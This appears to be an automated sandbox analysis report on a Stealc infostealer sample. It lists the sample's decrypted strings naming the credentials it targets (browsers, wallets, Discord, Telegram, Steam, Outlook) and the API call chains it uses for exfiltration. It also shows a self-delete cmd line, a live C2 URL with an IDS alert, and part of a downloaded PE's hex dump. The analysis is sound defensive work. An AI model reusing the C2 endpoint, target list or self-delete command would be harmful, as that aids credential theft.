Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: chrome
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: opera
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: firefox
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: wallets
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ProductName
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: x32
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: x64
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DisplayName
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Network Info:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: System Summary:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - HWID:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - OS:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - UserName:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - UTC:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Language:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Running Path:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - CPU:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Threads:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Cores:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - RAM:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: - GPU:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: User Agents:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: All Users:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Current User:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Process List:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Temp\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: .exe
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: runas
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: open
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: /c start
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: *.lnk
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: files
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \discord\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: key_datas
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: map*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Telegram
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Tox
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: *.tox
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: *.ini
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Password
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 00000001
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 00000002
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 00000003
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: 00000004
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Pidgin
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \.purple\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: token:
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: SteamPath
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \config\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ssfn*
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: config.vdf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Steam\
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: done
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: soft
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: https
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: POST
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: hwid
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: build
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: token
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: file_name
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: file
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: message
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 3.2.4CC1.tmp.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	3_2_00406000
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	3_2_00404B80
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_00407690
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00424090
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_00409BE0
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00409B80
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02459E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_02459E47
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02456267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	3_2_02456267
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02467260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	3_2_02467260
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_024742F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_024742F7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0245EFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	3_2_0245EFF7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02467047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	3_2_02467047
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_024578F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_024578F7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02454DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	3_2_02454DE7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02459DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_02459DE7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Unpacked PE file: 0.2.7gxaFDUSOD.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Unpacked PE file: 3.2.4CC1.tmp.exe.400000.0.unpack

Source: 7gxaFDUSOD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\7gxaFDUSOD.exe	Code function: 0_2_024A8C59 FindFirstFileExW,	0_2_024A8C59
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02461EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_02461EA7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_0246CF47
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02463F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02463F27
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0245DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_0245DFD7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02451807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_02451807
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02461827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02461827
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02451820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	3_2_02451820
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_0246D8A7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	3_2_0246E0B7
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_02465127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	3_2_02465127
Source: C:\Users\user\AppData\Local\Temp\4CC1.tmp.exe	Code function: 3_2_0246E597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	3_2_0246E597

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49707 -> 92.255.57.89:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.89/45c616e921a794b8.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 14:12:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 10 Dec 2024 14:00:01 GMTETag: "4a200-628eae5bb46ca"Accept-Ranges: bytesContent-Length: 303616Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 67 15 b8 1d 06 7b eb 1d 06 7b eb 1d 06 7b eb 03 54 ff eb 01 06 7b eb 03 54 ee eb 09 06 7b eb 03 54 f8 eb 45 06 7b eb 3a c0 00 eb 